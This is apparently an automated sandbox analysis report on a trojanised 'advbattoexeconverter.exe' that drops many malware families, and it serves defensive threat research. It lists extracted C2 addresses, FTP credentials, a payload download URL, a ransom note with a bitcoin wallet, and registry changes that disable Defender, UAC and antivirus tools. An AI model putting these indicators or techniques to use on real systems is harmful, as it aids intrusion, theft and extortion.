azorult | af09248cb756488850f9e6f9a7a00149005bf47a9b2087b792ff6bd937297ffb

Resubmissions

30-05-2024 16:03

240530-thqrsaeh82 10

26-04-2024 19:20

26-04-2024 19:17

26-04-2024 19:15

26-04-2024 18:18

26-04-2024 17:46

18-04-2024 16:20

17-04-2024 20:42

Analysis

max time kernel
337s
max time network
580s
platform
windows11-21h2_x64
resource
win11-20240412-en
resource tags

arch:x64arch:x86image:win11-20240412-enlocale:en-usos:windows11-21h2-x64system
submitted
18-04-2024 16:20

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

advbattoexeconverter.exe
Size

804KB
MD5

83bb1b476c7143552853a2cf983c1142
SHA1

8ff8ed5c533d70a7d933ec45264dd700145acd8c
SHA256

af09248cb756488850f9e6f9a7a00149005bf47a9b2087b792ff6bd937297ffb
SHA512

6916c6c5addf43f56b9de217e1b640ab6f4d7e5a73cd33a7189f66c9b7f0b954c5aa635f92fcef5692ca0ca0c8767e97a678e90d545079b5e6d421555f5b761a
SSDEEP

24576:0xFkFHdJ8aT/iziXH6FGnYhqQuimKC6Qpor:0IdJ1KiBYhsl+r

Malware Config

Extracted

Credentials

Protocol: ftp
Host:
109.248.203.81
Port:
21
Username:
alex
Password:
easypassword

Extracted

Family

warzonerat

168.61.222.215:5400

Extracted

Family

revengerat

Botnet

Guest

0.tcp.ngrok.io:19521

Mutex

RV_MUTEX

Extracted

Family

modiloader

https://drive.google.com/u/0/uc?id=1TcSctGVBajYMA7CFDc158wpvqkpxmkhJ&export=download

Extracted

Family

netwire

tamerimia.ug:6975

vbchjfssdfcxbcver.ru:6975

Attributes

activex_autorun
false
copy_executable
false
delete_original
false
host_id
AAAAA
lock_executable
false
mutex
CQbRXVuG
offline_keylogger
false
password
jhbkdcfgvdfgknl
registry_autorun
false
use_mutex
true

Extracted

Family

crimsonrat

185.136.161.124

Extracted

Path

C:\Users\Admin\Downloads\!Please Read Me!.txt

Family

wannacry

Ransom Note

Q: What's wrong with my files? A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted. If you follow our instructions we guarantee that you can decrypt all your files quickly and safely! Let's start decrypting! Q: What do I do? A: First, you need to pay service fees for the decryption. Please send $300 worth of bitcoin to this bitcoin address: 15zGqZCTcys6eCjDkE3DypCjXi6QWRV6V1 Next, please find the decrypt software on your desktop, an executable file named "!WannaDecryptor!.exe". If it does not exsit, download the software from the address below. (You may need to disable your antivirus for a while.) rar password: wcry123 Run and follow the instructions! �

Wallets

15zGqZCTcys6eCjDkE3DypCjXi6QWRV6V1

Signatures

Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
trojan infostealer azorult

CrimsonRAT main payload 1 IoCs

resource	yara_rule
behavioral1/files/0x000100000002ab04-1830.dat	family_crimsonrat

CrimsonRat
Crimson RAT is a malware linked to a Pakistani-linked threat actor.
rat crimsonrat
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
trojan modiloader

Modifies WinLogon for persistence 2 TTPs 3 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserInit = "C:\\Windows\\system32\\userinit.exe,C:\\Windows\\system32\\Windupdt\\winupdate.exe"	Blackkomet.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserInit = "C:\\Windows\\system32\\userinit.exe,C:\\Windows\\system32\\Windupdt\\winupdate.exe,C:\\Windows\\system32\\Windupdt\\winupdate.exe"	Blackkomet.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserInit = "C:\\Windows\\system32\\userinit.exe,C:\\Windows\\system32\\Windupdt\\winupdate.exe,C:\\Windows\\system32\\Windupdt\\winupdate.exe,C:\\Windows\\system32\\Windupdt\\winupdate.exe"	Blackkomet.exe

Modifies Windows Defender Real-time Protection settings 3 TTPs 5 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Azorult (3).exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	Azorult (3).exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	Azorult (3).exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	Azorult (3).exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1"	Azorult (3).exe

Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-3777591257-2471171023-3629228286-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	taskhostw.exe

NetWire RAT payload 1 IoCs

rat

resource	yara_rule
behavioral1/memory/5508-1826-0x0000000000400000-0x0000000000433000-memory.dmp	netwire

Netwire
Netwire is a RAT with main functionalities focused password stealing and keylogging, but also includes remote control capabilities as well.
botnet stealer netwire

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process	8072	5856	runonce.exe	159

RMS
Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.
trojan rat rms
RevengeRAT
Remote-access trojan with a wide range of capabilities.
trojan revengerat

UAC bypass 3 TTPs 7 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Azorult (3).exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	Azorult (3).exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	regedit.exe

Wannacry
WannaCry is a ransomware cryptoworm.
ransomware worm wannacry
WarzoneRat, AveMaria
WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.
rat infostealer warzonerat

Windows security bypass 2 TTPs 1 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths	regedit.exe

njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

ModiLoader First Stage 4 IoCs

resource	yara_rule
behavioral1/files/0x000100000002aac4-548.dat	modiloader_stage1
behavioral1/memory/1364-1636-0x0000000010410000-0x000000001047E000-memory.dmp	modiloader_stage1
behavioral1/memory/1364-1747-0x0000000010410000-0x000000001047E000-memory.dmp	modiloader_stage1
behavioral1/memory/1364-1818-0x0000000010410000-0x000000001047E000-memory.dmp	modiloader_stage1

ReZer0 packer 1 IoCs

Detects ReZer0, a packer with multiple versions used in various campaigns.

rezer0

resource	yara_rule
behavioral1/memory/4716-735-0x0000000005C20000-0x0000000005C48000-memory.dmp	rezer0

RevengeRat Executable 1 IoCs

stealer

resource	yara_rule
behavioral1/files/0x000200000002aac6-630.dat	revengerat

Warzone RAT payload 4 IoCs

rat

resource	yara_rule
behavioral1/memory/2888-743-0x0000000000400000-0x0000000000553000-memory.dmp	warzonerat
behavioral1/memory/2888-746-0x0000000000400000-0x0000000000553000-memory.dmp	warzonerat
behavioral1/memory/2888-748-0x0000000000400000-0x0000000000553000-memory.dmp	warzonerat
behavioral1/memory/2888-783-0x0000000000400000-0x0000000000553000-memory.dmp	warzonerat

Blocks application from running via registry modification 13 IoCs

Adds application to list of disallowed applications.

evasion

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3777591257-2471171023-3629228286-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\6 = "ESETOnlineScanner_UKR.exe"	Azorult (3).exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3777591257-2471171023-3629228286-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\7 = "ESETOnlineScanner_RUS.exe"	Azorult (3).exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3777591257-2471171023-3629228286-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\10 = "Cezurity_Scanner_Pro_Free.exe"	Azorult (3).exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3777591257-2471171023-3629228286-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\11 = "Cube.exe"	Azorult (3).exe
Key created	\REGISTRY\USER\S-1-5-21-3777591257-2471171023-3629228286-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	Azorult (3).exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3777591257-2471171023-3629228286-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "eav_trial_rus.exe"	Azorult (3).exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3777591257-2471171023-3629228286-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\8 = "HitmanPro.exe"	Azorult (3).exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3777591257-2471171023-3629228286-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\9 = "360TS_Setup_Mini.exe"	Azorult (3).exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3777591257-2471171023-3629228286-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\4 = "essf_trial_rus.exe"	Azorult (3).exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3777591257-2471171023-3629228286-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\5 = "hitmanpro_x64.exe"	Azorult (3).exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3777591257-2471171023-3629228286-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	Azorult (3).exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3777591257-2471171023-3629228286-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\2 = "avast_free_antivirus_setup_online.exe"	Azorult (3).exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3777591257-2471171023-3629228286-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\3 = "eis_trial_rus.exe"	Azorult (3).exe

Downloads MZ/PE file

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	cmd.exe

Modifies Windows Firewall 2 TTPs 23 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
8780	netsh.exe
8040	netsh.exe
9196	netsh.exe
7328	netsh.exe
5716	netsh.exe
2544	netsh.exe
6104	netsh.exe
3016	netsh.exe
2104	netsh.exe
9040	netsh.exe
8076	netsh.exe
5836	netsh.exe
5372	netsh.exe
4820	netsh.exe
4240	netsh.exe
8516	netsh.exe
8316	netsh.exe
5596	netsh.exe
5180	netsh.exe
8020	netsh.exe
1212	netsh.exe
4332	netsh.exe
6088	netsh.exe

Office macro that triggers on suspicious action 1 IoCs

Office document macro which triggers in special circumstances - often malicious.

macro macro_on_action

resource	yara_rule
behavioral1/files/0x000100000002aac3-538.dat	office_macro_on_action

Sets file to hidden 1 TTPs 9 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1564.001

pid	Process
5940	attrib.exe
7916	attrib.exe
5224	attrib.exe
5140	attrib.exe
5304	attrib.exe
8860	attrib.exe
240	attrib.exe
5904	attrib.exe
5988	attrib.exe

Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Drops startup file 8 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\b9584a316aeb9ca9b31edd4db18381f5.exe\:SmartScreen:$DATA	NJRat.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\b9584a316aeb9ca9b31edd4db18381f5.exe\:Zone.Identifier:$DATA	NJRat.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe	RegSvcs.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe	RegSvcs.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe\:SmartScreen:$DATA	RegSvcs.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe\:Zone.Identifier:$DATA	RegSvcs.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\b9584a316aeb9ca9b31edd4db18381f5.exe	NJRat.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\b9584a316aeb9ca9b31edd4db18381f5.exe	NJRat.exe

Executes dropped EXE 35 IoCs

pid	Process
4716	WarzoneRAT.exe
3768	RevengeRAT.exe
1432	Remcos.exe
3864	Userdata.exe
836	NetWire.exe
1364	NetWire.exe
4960	NJRat.exe
5756	CrimsonRAT.exe
5892	dlrarhsiva.exe
1852	Blackkomet.exe
5188	svchost.exe
5212	Blackkomet.exe
5676	Blackkomet.exe
6896	svchost.exe
7600	AgentTesla (2).exe
8088	Azorult (3).exe
1212	wini.exe
6384	winit.exe
6528	cheat.exe
7820	rutserv.exe
6720	taskhost.exe
1572	ink.exe
7612	P.exe
7964	rutserv.exe
460	rutserv.exe
6124	rutserv.exe
5876	rfusclient.exe
5624	rfusclient.exe
7372	rfusclient.exe
8552	R8.exe
5948	winlog.exe
5488	winlogon.exe
2412	taskhostw.exe
5384	Rar.exe
8164	winlogon.exe

Loads dropped DLL 4 IoCs

pid	Process
3556	advbattoexeconverter.exe
3556	advbattoexeconverter.exe
3556	advbattoexeconverter.exe
5856	WINWORD.EXE

Modifies file permissions 1 TTPs 62 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
8160	icacls.exe
3920	icacls.exe
8572	icacls.exe
6920	icacls.exe
2920	icacls.exe
6036	icacls.exe
6628	icacls.exe
648	icacls.exe
9164	icacls.exe
6184	icacls.exe
2348	icacls.exe
8044	icacls.exe
8640	icacls.exe
4880	icacls.exe
8344	icacls.exe
7484	icacls.exe
5932	icacls.exe
7944	icacls.exe
7948	icacls.exe
6288	icacls.exe
8260	icacls.exe
5392	icacls.exe
6476	icacls.exe
7932	icacls.exe
8496	icacls.exe
2012	icacls.exe
1052	icacls.exe
8844	icacls.exe
8276	icacls.exe
8764	icacls.exe
8840	icacls.exe
2584	icacls.exe
9188	icacls.exe
2800	icacls.exe
2916	icacls.exe
6860	icacls.exe
3568	icacls.exe
5364	icacls.exe
5864	icacls.exe
2212	icacls.exe
2788	icacls.exe
7576	icacls.exe
2876	icacls.exe
8000	icacls.exe
7260	icacls.exe
8412	icacls.exe
1080	icacls.exe
1432	icacls.exe
5720	icacls.exe
1860	icacls.exe
7612	icacls.exe
5552	icacls.exe
6524	icacls.exe
8796	icacls.exe
8048	icacls.exe
5604	icacls.exe
2248	icacls.exe
8948	icacls.exe
8904	icacls.exe
8484	icacls.exe
644	icacls.exe
5548	icacls.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000200000002ab95-253107.dat	upx
behavioral1/files/0x000100000002abb2-262181.dat	upx

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

Adds Run key to start application 2 TTPs 10 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3777591257-2471171023-3629228286-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\svchost.exe"	RegSvcs.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3777591257-2471171023-3629228286-1000\Software\Microsoft\Windows\CurrentVersion\Run\remcos = "\"C:\\Windows\\SysWOW64\\Userdata\\Userdata.exe\""	Remcos.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3777591257-2471171023-3629228286-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Qspt = "C:\\Users\\Admin\\AppData\\Local\\Qspt\\Qspt.hta"	NetWire.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\b9584a316aeb9ca9b31edd4db18381f5 = "\"C:\\Users\\Admin\\Downloads\\NJRat.exe\" .."	NJRat.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3777591257-2471171023-3629228286-1000\Software\Microsoft\Windows\CurrentVersion\Run\winupdater = "C:\\Windows\\system32\\Windupdt\\winupdate.exe"	Blackkomet.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe"	taskhostw.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3777591257-2471171023-3629228286-1000\Software\Microsoft\Windows\CurrentVersion\Run\remcos = "\"C:\\Windows\\SysWOW64\\Userdata\\Userdata.exe\""	Userdata.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3777591257-2471171023-3629228286-1000\Software\Microsoft\Windows\CurrentVersion\Run\winupdater = "C:\\Windows\\system32\\Windupdt\\winupdate.exe"	Blackkomet.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3777591257-2471171023-3629228286-1000\Software\Microsoft\Windows\CurrentVersion\Run\b9584a316aeb9ca9b31edd4db18381f5 = "\"C:\\Users\\Admin\\Downloads\\NJRat.exe\" .."	NJRat.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3777591257-2471171023-3629228286-1000\Software\Microsoft\Windows\CurrentVersion\Run\winupdater = "C:\\Windows\\system32\\Windupdt\\winupdate.exe"	Blackkomet.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Azorult (3).exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 17 IoCs

Web Service

T1102

flow	ioc
61	drive.google.com
89	0.tcp.ngrok.io
243	pastebin.com
23	0.tcp.ngrok.io
127	0.tcp.ngrok.io
150	0.tcp.ngrok.io
169	0.tcp.ngrok.io
181	0.tcp.ngrok.io
62	drive.google.com
180	iplogger.org
192	pastebin.com
23	raw.githubusercontent.com
41	raw.githubusercontent.com
93	0.tcp.ngrok.io
179	iplogger.org
183	0.tcp.ngrok.io
192	0.tcp.ngrok.io

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
164	ip-api.com

Modifies WinLogon 2 TTPs 6 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	Azorult (3).exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList	Azorult (3).exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts	Azorult (3).exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	Azorult (3).exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList	Azorult (3).exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts	Azorult (3).exe

AutoIT Executable 3 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x000600000002aac7-171542.dat	autoit_exe
behavioral1/files/0x000100000002ab6c-214243.dat	autoit_exe
behavioral1/files/0x000100000002ab73-224124.dat	autoit_exe

Drops file in System32 directory 22 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	powershell.exe
File created	C:\Windows\SysWOW64\remcos\logs.dat	Userdata.exe
File created	C:\Windows\SysWOW64\Windupdt\winupdate.exe	Blackkomet.exe
File opened for modification	C:\Windows\SysWOW64\Windupdt\winupdate.exe	Blackkomet.exe
File opened for modification	C:\Windows\SysWOW64\Windupdt\	Blackkomet.exe
File created	C:\Windows\SysWOW64\Windupdt\winupdate.exe	Blackkomet.exe
File opened for modification	C:\Windows\SysWOW64\Windupdt\	Blackkomet.exe
File opened for modification	C:\Windows\SysWOW64\Windupdt\winupdate.exe	Blackkomet.exe
File created	C:\Windows\SysWOW64\Userdata\Userdata.exe	Remcos.exe
File created	C:\Windows\SysWOW64\Userdata\Userdata.exe:Zone.Identifier:$DATA	Remcos.exe
File opened for modification	C:\Windows\SysWOW64\Windupdt\winupdate.exe	Blackkomet.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	powershell.exe
File opened for modification	C:\Windows\SysWOW64\remcos\logs.dat	Userdata.exe
File created	C:\Windows\SysWOW64\Windupdt\winupdate.exe:SmartScreen:$DATA	Blackkomet.exe
File created	C:\Windows\SysWOW64\Windupdt\winupdate.exe:Zone.Identifier:$DATA	Blackkomet.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	powershell.exe
File opened for modification	C:\Windows\SysWOW64\Userdata\Userdata.exe	Remcos.exe
File created	C:\Windows\SysWOW64\Userdata\Userdata.exe:SmartScreen:$DATA	Remcos.exe
File opened for modification	C:\Windows\SysWOW64\Userdata	Remcos.exe
File created	C:\Windows\SysWOW64\Windupdt\winupdate.exe	Blackkomet.exe
File opened for modification	C:\Windows\SysWOW64\Windupdt\	Blackkomet.exe
File opened for modification	C:\Windows\System32\GroupPolicy	powershell.exe

Suspicious use of SetThreadContext 7 IoCs

description	pid	Process	procid_target
PID 4716 set thread context of 2888	4716	WarzoneRAT.exe	139
PID 3768 set thread context of 1420	3768	RevengeRAT.exe	141
PID 1420 set thread context of 428	1420	RegSvcs.exe	142
PID 1364 set thread context of 5508	1364	NetWire.exe	175
PID 5188 set thread context of 5580	5188	svchost.exe	237
PID 5580 set thread context of 6080	5580	RegSvcs.exe	238
PID 6896 set thread context of 5940	6896	svchost.exe	302

Drops file in Program Files directory 33 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Malwarebytes	Azorult (3).exe
File opened for modification	C:\Program Files (x86)\AVAST Software	Azorult (3).exe
File opened for modification	C:\Program Files (x86)\Panda Security	Azorult (3).exe
File created	C:\Program Files (x86)\Briano\UWPHook\MaterialDesignColors.dll	AgentTesla (2).exe
File created	C:\Program Files (x86)\Briano\UWPHook\SharpSteam.dll	AgentTesla (2).exe
File created	C:\Program Files (x86)\Briano\UWPHook\System.Management.Automation.dll	AgentTesla (2).exe
File created	C:\Program Files (x86)\Briano\UWPHook\VDFParser.dll	AgentTesla (2).exe
File opened for modification	C:\Program Files (x86)\Kaspersky Lab	Azorult (3).exe
File opened for modification	C:\Program Files\Cezurity	Azorult (3).exe
File opened for modification	C:\Program Files (x86)\Advanced BAT to EXE Converter v4.61\uninstall.ini	advbattoexeconverter.exe
File created	C:\Program Files (x86)\Briano\UWPHook\Microsoft.Management.Infrastructure.dll	AgentTesla (2).exe
File opened for modification	C:\Program Files (x86)\360	Azorult (3).exe
File opened for modification	C:\Program Files (x86)\SpyHunter	Azorult (3).exe
File created	C:\Program Files (x86)\Briano\UWPHook\MaterialDesignThemes.Wpf.dll	AgentTesla (2).exe
File opened for modification	C:\Program Files\SpyHunter	Azorult (3).exe
File opened for modification	C:\Program Files\ESET	Azorult (3).exe
File opened for modification	C:\Program Files\Kaspersky Lab	Azorult (3).exe
File created	C:\Program Files (x86)\Briano\UWPHook\UWPHook.exe	AgentTesla (2).exe
File created	C:\Program Files\Common Files\System\iediagcmd.exe	Azorult (3).exe
File opened for modification	C:\Program Files\AVAST Software	Azorult (3).exe
File opened for modification	C:\Program Files\AVG	Azorult (3).exe
File opened for modification	C:\Program Files\Common Files\McAfee	Azorult (3).exe
File opened for modification	C:\Program Files (x86)\GRIZZLY Antivirus	Azorult (3).exe
File created	C:\Program Files (x86)\Briano\UWPHook\System.Management.Automation.xml	AgentTesla (2).exe
File opened for modification	C:\Program Files (x86)\Microsoft JDX	Azorult (3).exe
File opened for modification	C:\Program Files\Enigma Software Group	Azorult (3).exe
File opened for modification	C:\Program Files (x86)\Cezurity	Azorult (3).exe
File opened for modification	C:\Program Files\ByteFence	Azorult (3).exe
File opened for modification	C:\Program Files (x86)\AVG	Azorult (3).exe
File created	C:\Program Files (x86)\Briano\UWPHook\MaterialDesignThemes.Wpf.xml	AgentTesla (2).exe
File created	C:\Program Files (x86)\Briano\UWPHook\UWPHook.exe.config	AgentTesla (2).exe
File opened for modification	C:\Program Files (x86)\Zaxar	Azorult (3).exe
File opened for modification	C:\Program Files\COMODO	Azorult (3).exe

Drops file in Windows directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\_CutButterball	WINWORD.EXE
File opened for modification	C:\Windows\BreakTart	WINWORD.EXE

Launches sc.exe 24 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
9164	sc.exe
9060	sc.exe
7084	sc.exe
7336	sc.exe
2928	sc.exe
7812	sc.exe
6932	sc.exe
8468	sc.exe
6964	sc.exe
6236	sc.exe
2792	sc.exe
7156	sc.exe
6844	sc.exe
684	sc.exe
1316	sc.exe
7552	sc.exe
5696	sc.exe
8852	sc.exe
8956	sc.exe
1668	sc.exe
6564	sc.exe
5284	sc.exe
2576	sc.exe
7284	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 5 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	winit.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	winit.exe

Creates scheduled task(s) 1 TTPs 6 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
2924	schtasks.exe
572	schtasks.exe
5608	schtasks.exe
4340	schtasks.exe
7412	schtasks.exe
4292	schtasks.exe

Delays execution with timeout.exe 7 IoCs

evasion

pid	Process
3144	timeout.exe
1340	timeout.exe
8776	timeout.exe
4436	timeout.exe
4128	timeout.exe
6844	timeout.exe
5772	timeout.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

